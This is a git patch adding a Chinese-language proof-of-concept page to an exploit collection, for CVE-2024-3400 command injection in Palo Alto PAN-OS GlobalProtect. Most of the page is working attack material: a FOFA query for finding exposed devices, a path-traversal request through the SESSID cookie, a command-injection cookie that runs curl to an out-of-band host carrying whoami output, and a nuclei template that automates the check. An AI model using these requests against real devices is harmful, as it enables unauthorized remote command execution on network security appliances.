From 877bc544a6855add86df0e89db8c20980d84a5ef Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 19 Apr 2024 09:30:29 +0800
Subject: [PATCH] =?UTF-8?q?Create=20PAN-OS=E5=AE=89=E5=85=A8=E8=AE=BE?=
 =?UTF-8?q?=E5=A4=87=E5=AD=98=E5=9C=A8=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E(CVE-2024-3400).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...安全设备存在命令执行漏洞(CVE-2024-3400).md | 65 +++++++++++++++++++
 1 file changed, 65 insertions(+)
 create mode 100644 PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md

diff --git a/PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md b/PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md
new file mode 100644
index 0000000..897cad0
--- /dev/null
+++ b/PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md
@@ -0,0 +1,65 @@
+## PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400)
+
+PAN-OS安全设备是PaloAlto公司的一款VPN设备，其使管理者无论位于何处都能够通过将下一代安全平台扩展到所有用户保护网络安全。它通过应用平台的功能来了解应用程序的使用情况。它将流量与用户和设备相关联并通过下一代技术实施安全策略来保护流量。其GlobalProtect功能的login.esp接口的Cookie存在未授权远程命令执行漏洞，攻击者可通过该漏洞控制设备。
+
+## fofa
+```
+icon_hash="-631559155"
+```
+
+
+## poc
+```
+POST /ssl-vpn/hipreport.esp HTTP/1.1
+Host: 127.0.0.1
+Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/d94dec78-deb5-440c-9883-99ec1d954ebe)
+
+## Command Injection
+```
+POST /ssl-vpn/hipreport.esp HTTP/1.1
+Host: 127.0.01
+Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+```
+
+## CVE-2024-3400.yaml
+```
+id: palo-alto-networks-pan-os-command-injection
+info:
+  name: Palo Alto Networks PAN-OS Command Injection Vulnerability
+  author: generated with pdteam AI
+  severity: Critical
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/ssl-vpn/hipreport.esp"
+    headers:
+      Cookie: "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;"
+      Connection: "close"
+      Content-Type: "application/x-www-form-urlencoded"
+      Content-Length: "0"
+    matchers:
+      - type: status
+        status:
+          - 200
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/global-protect/portal/images/poc.txt"
+    matchers:
+      - type: status
+        status:
+          - 403
+```
+
+## 漏洞来源
+- https://github.com/h4x0r-dz/CVE-2024-3400